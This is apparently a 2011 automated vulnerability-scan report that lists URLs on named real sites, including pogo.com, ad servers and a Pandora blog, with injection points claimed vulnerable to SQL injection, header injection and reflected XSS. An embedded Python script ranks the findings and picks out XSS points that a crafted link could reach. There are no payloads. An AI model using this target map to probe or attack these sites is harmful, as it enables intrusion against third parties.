DORK Report for January 13, 2011 | Vulnerability Crawler Target Map

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:03:58 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]

1.3. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]

1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter]

1.6. http://game3.pogo.com/room/game/game.jsp [apid parameter]

1.7. http://game3.pogo.com/room/game/game.jsp [rkey parameter]

1.8. http://game3.pogo.com/room/game/game.jsp [s_sess cookie]

1.9. http://link.mavnt.com/1x1.php [51270 parameter]

1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]

1.11. http://link.mavnt.com/1x1_map.php [51270 parameter]

1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]

1.13. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ses15 cookie]

1.14. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [rsid cookie]

1.15. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 [mt_clk cookie]

1.16. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 [mt_clk cookie]

1.17. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= [mt_clk cookie]

1.18. http://www.pogo.com/ [com.pogo.ga cookie]

1.19. http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie]

1.20. http://www.pogo.com/home/home.jsp [com.pogo.info cookie]

1.21. http://www.pogo.com/home/home.jsp [com.pogo.unid cookie]

1.22. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [s_cc cookie]

1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter]

1.24. http://www.pogo.com/prize/prize.do [com.pogo.hp.ls.cfg cookie]

1.25. http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie]

1.26. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ [PHPSESSID cookie]

1.27. http://www1.peanutlabs.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]

1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1]

2.3. http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1]

2.4. http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1]

2.5. http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1]

2.16. http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1]

2.17. http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1]

2.18. http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1]

2.19. http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1]

2.20. http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1]

2.21. http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1]

2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.23. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.24. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.25. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.26. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

2.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

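Every entry in this report has the same shape: an item number, the URL, and in brackets the injection point the scanner tested (a named request parameter, a cookie, an HTTP header, a numbered REST URL path segment, or the name of an arbitrary parameter). The parser below is an added example for triaging such a listing; it is not part of the tooling that generated this page. Its sample input is a short excerpt of this page's own entries. Two things in it are the example's own assumptions, not something the report states: that "REST URL parameter N" counts non-empty path segments from 1, and the "linkable" heuristic, which treats only parameter- and path-based reflection points as deliverable to a victim through a crafted link (a reflected XSS in a cookie or User-Agent needs control of the victim's own request; for SQL injection the distinction does not matter, because the attacker sends that request directly).

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlparse

# Constructed sample: an excerpt of this page's entries in the report's
# "N.M. <url> [<injection point>]" shape, preceded by their section headings.
SAMPLE_REPORT = """\
1. SQL injection
1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter]
1.8. http://game3.pogo.com/room/game/game.jsp [s_sess cookie]
1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]
1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header]
2. HTTP header injection
2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1]
2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
3. Cross-site scripting (reflected)
3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]
3.15. http://blog.pandora.com/faq [REST URL parameter 1]
3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2]
"""

SECTION_RE = re.compile(r"^(\d+)\.\s+(.+)$")
FINDING_RE = re.compile(r"^(\d+)\.(\d+)\.\s+(\S+)\s+\[(.+)\]$")
REST_RE = re.compile(r"^REST URL parameter (\d+)$")

# Assumption: only these injection points can be carried in a URL handed to a
# victim; cookie and header points require control of the victim's request.
LINKABLE_KINDS = {"param", "param-name", "path-segment"}


def classify_point(point):
    """Map the bracketed injection-point label to a coarse kind."""
    if point.endswith(" cookie"):
        return "cookie"
    if point.endswith(" HTTP header"):
        return "header"
    if REST_RE.match(point):
        return "path-segment"
    if point.startswith("name of an arbitrarily supplied"):
        return "param-name"
    if point.endswith(" parameter"):
        return "param"
    return "other"


def resolve_segment(url, point):
    """Path segment a 'REST URL parameter N' label refers to.
    Assumption: N is 1-based over the non-empty path segments."""
    m = REST_RE.match(point)
    if not m:
        return None
    segments = [s for s in urlparse(url).path.split("/") if s]
    index = int(m.group(1)) - 1
    return segments[index] if 0 <= index < len(segments) else None


def parse_report(text):
    """Parse the listing into dicts; the section heading supplies the class."""
    findings, vuln_class = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = FINDING_RE.match(line)
        if m:
            sec, item, url, point = m.groups()
            kind = classify_point(point)
            findings.append({
                "id": f"{sec}.{item}", "class": vuln_class, "url": url,
                "host": urlparse(url).hostname, "point": point, "kind": kind,
                "segment": resolve_segment(url, point),
                "linkable": kind in LINKABLE_KINDS,
            })
            continue
        m = SECTION_RE.match(line)
        if m:
            vuln_class = m.group(2)
    return findings


def summarize(findings):
    """Per-host count of findings by vulnerability class."""
    by_host = defaultdict(Counter)
    for f in findings:
        by_host[f["host"]][f["class"]] += 1
    return {host: dict(c) for host, c in by_host.items()}


def triage_order(findings):
    """Hosts ordered by breadth (distinct class/kind pairs), then volume."""
    combos, counts = defaultdict(set), Counter()
    for f in findings:
        combos[f["host"]].add((f["class"], f["kind"]))
        counts[f["host"]] += 1
    return sorted(combos, key=lambda h: (-len(combos[h]), -counts[h], h))


def linkable_xss(findings):
    """IDs of reflected-XSS findings reachable through a crafted link."""
    return [f["id"] for f in findings
            if (f["class"] or "").startswith("Cross-site scripting") and f["linkable"]]


if __name__ == "__main__":
    found = parse_report(SAMPLE_REPORT)
    for host in triage_order(found):
        print(host, summarize(found)[host])
    print("linkable XSS:", linkable_xss(found))
```

To run it over the whole page, pass the saved listing to `parse_report` instead of `SAMPLE_REPORT`; the blank lines between entries are skipped. The many `blog.pandora.com` archive entries then collapse to one host with a single class/kind pair, which is what `triage_order` is meant to surface: breadth of distinct injection kinds per host, not raw entry count, drives where a retest starts.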
3. Cross-site scripting (reflected)

3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.2. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.3. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.4. http://ads.adxpose.com/ads/ads.js [uid parameter]

3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

3.7. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.8. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.9. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.10. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.15. http://blog.pandora.com/faq [REST URL parameter 1]

3.16. http://blog.pandora.com/faq/ [REST URL parameter 1]

3.17. http://blog.pandora.com/faq/index.xml [REST URL parameter 1]

3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2]

3.19. http://blog.pandora.com/jobs [REST URL parameter 1]

3.20. http://blog.pandora.com/pandora/ [REST URL parameter 1]

3.21. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1]

3.22. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2]

3.23. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3]

3.24. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4]

3.25. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1]

3.26. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2]

3.27. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3]

3.28. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4]

3.29. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1]

3.30. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2]

3.31. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3]

3.32. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4]

3.33. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1]

3.34. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2]

3.35. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3]

3.36. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4]

3.37. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1]

3.38. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2]

3.39. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3]

3.40. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4]

3.41. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1]

3.42. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2]

3.43. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3]

3.44. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4]

3.45. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1]

3.46. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2]

3.47. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3]

3.48. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4]

3.49. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1]

3.50. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2]

3.51. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3]

3.52. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4]

3.53. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1]

3.54. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2]

3.55. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3]

3.56. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4]

3.57. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1]

3.58. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2]

3.59. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3]

3.60. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4]

3.61. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1]

3.62. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2]

3.63. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3]

3.64. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4]

3.65. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1]

3.66. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2]

3.67. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3]

3.68. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4]

3.69. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1]

3.70. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2]

3.71. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3]

3.72. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4]

3.73. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1]

3.74. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2]

3.75. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3]

3.76. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4]

3.77. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1]

3.78. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2]

3.79. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3]

3.80. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4]

3.81. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1]

3.82. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2]

3.83. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3]

3.84. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4]

3.85. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1]

3.86. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2]

3.87. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3]

3.88. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4]

3.89. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1]

3.90. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2]

3.91. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3]

3.92. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4]

3.93. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1]

3.94. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2]

3.95. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3]

3.96. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4]

3.97. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1]

3.98. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2]

3.99. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3]

3.100. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4]

3.101. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1]

3.102. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2]

3.103. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3]

3.104. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4]

3.105. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1]

3.106. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2]

3.107. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3]

3.108. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4]

3.109. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1]

3.110. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2]

3.111. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3]

3.112. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4]

3.113. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1]

3.114. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2]

3.115. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3]

3.116. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4]

3.117. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1]

3.118. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2]

3.119. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3]

3.120. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4]

3.121. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1]

3.122. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2]

3.123. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3]

3.124. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4]

3.125. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1]

3.126. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2]

3.127. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 3]

3.128. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 4]

3.129. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 1]

3.130. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 2]

3.131. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3]

3.132. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4]

3.133. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1]

3.134. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2]

3.135. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3]

3.136. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4]

3.137. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1]

3.138. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2]

3.139. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3]

3.140. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4]

3.141. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1]

3.142. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2]

3.143. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3]

3.144. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4]

3.145. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1]

3.146. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2]

3.147. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3]

3.148. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4]

3.149. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1]

3.150. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2]

3.151. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3]

3.152. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4]

3.153. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1]

3.154. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2]

3.155. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3]

3.156. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4]

3.157. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1]

3.158. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2]

3.159. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3]

3.160. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4]

3.161. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1]

3.162. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2]

3.163. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3]

3.164. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4]

3.165. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1]

3.166. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2]

3.167. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3]

3.168. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4]

3.169. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1]

3.170. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2]

3.171. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3]

3.172. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4]

3.173. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1]

3.174. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2]

3.175. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3]

3.176. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4]

3.177. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1]

3.178. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2]

3.179. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3]

3.180. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4]

3.181. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1]

3.182. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2]

3.183. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3]

3.184. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4]

3.185. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1]

3.186. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2]

3.187. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3]

3.188. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4]

3.189. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1]

3.190. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2]

3.191. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3]

3.192. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4]

3.193. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1]

3.194. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2]

3.195. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3]

3.196. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4]

3.197. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1]

3.198. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 2]

3.199. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 3]

3.200. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 4]

3.201. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 1]

3.202. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 2]

3.203. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 3]

3.204. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 4]

3.205. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 1]

3.206. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 2]

3.207. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 3]

3.208. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 4]

3.209. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 1]

3.210. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 2]

3.211. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 3]

3.212. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 4]

3.213. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 1]

3.214. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 2]

3.215. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 3]

3.216. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 4]

3.217. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 1]

3.218. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 2]

3.219. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 3]

3.220. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 4]

3.221. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 1]

3.222. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 2]

3.223. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 3]

3.224. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 4]

3.225. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 1]

3.226. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 2]

3.227. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 3]

3.228. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 4]

3.229. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 1]

3.230. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 2]

3.231. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 3]

3.232. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 4]

3.233. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 1]

3.234. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 2]

3.235. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 3]

3.236. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 4]

3.237. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 1]

3.238. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 2]

3.239. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 3]

3.240. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 4]

3.241. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 1]

3.242. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 2]

3.243. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 3]

3.244. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 4]

3.245. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 1]

3.246. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 2]

3.247. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 3]

3.248. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 4]

3.249. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 1]

3.250. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 2]

3.251. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 3]

3.252. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 4]

3.253. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 1]

3.254. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 2]

3.255. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 3]

3.256. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 4]

3.257. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 1]

3.258. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 2]

